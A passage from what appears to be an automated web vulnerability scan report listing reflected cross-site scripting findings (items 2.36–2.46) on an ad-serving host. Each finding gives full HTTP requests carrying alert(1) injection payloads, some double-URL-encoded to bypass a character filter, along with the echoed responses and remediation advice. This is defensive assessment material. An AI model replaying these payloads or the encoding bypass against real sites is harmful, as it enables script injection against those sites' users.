P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844"><script>alert(1)</script>b32014b325/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.36. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc53%2522%253balert%25281%2529%252f%252f862f59f63eb was submitted in the REST URL parameter 3. This input was echoed as 6cc53";alert(1)//862f59f63eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53%2522%253balert%25281%2529%252f%252f862f59f63eb/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53";alert(1)//862f59f63eb/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff13"-alert(1)-"56d7644f92 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*4ff13"-alert(1)-"56d7644f92 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2337

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*4ff13"-alert(1)-"56d7644f92">
...[SNIP]...

2.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd7ff"><script>alert(1)</script>dc019ab0230 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*dd7ff"><script>alert(1)</script>dc019ab0230 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2369

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*dd7ff"><script>alert(1)</script>dc019ab0230http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6f8"-alert(1)-"5117fe222e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&8c6f8"-alert(1)-"5117fe222e0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2345

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&8c6f8"-alert(1)-"5117fe222e0=1">
...[SNIP]...

2.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b283c"><script>alert(1)</script>008acd22d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&b283c"><script>alert(1)</script>008acd22d8c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://my.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2375

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&b283c"><script>alert(1)</script>008acd22d8c=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0d08'-alert(1)-'40c23d3dbd0 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**;10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*b0d08'-alert(1)-'40c23d3dbd0 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/
Set-Cookie: i_1=46:1354:802:44:0:32947:1290209607:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 724

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*b0d08'-alert(1)-'40c23d3dbd0http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.802.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

2.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28 was submitted in the REST URL parameter 2. This input was echoed as fab6b";alert(1)//4025c98bb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28/1354.0.iframe.200x33/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b";alert(1)//4025c98bb28/1354.0.iframe.200x33/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941 was submitted in the REST URL parameter 2. This input was echoed as 59a15"><script>alert(1)</script>50fd7015941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135759a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941/1354.0.iframe.200x33/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135759a15"><script>alert(1)</script>50fd7015941/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec was submitted in the REST URL parameter 3. This input was echoed as 8e66a"><script>alert(1)</script>0f40fdd33ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a"><script>alert(1)</script>0f40fdd33ec/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50920%2522%253balert%25281%2529%252f%252f3c39df87c6c was submitted in the REST URL parameter 3. This input was echoed as 50920";alert(1)//3c39df87c6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920%2522%253balert%25281%2529%252f%252f3c39df87c6c/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920";alert(1)//3c39df87c6c/1290209593**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e20'-alert(1)-'7aac6d5594e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**;10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&d2e20'-alert(1)-'7aac6d5594e=1 HTTP/1.1
Accept: */*
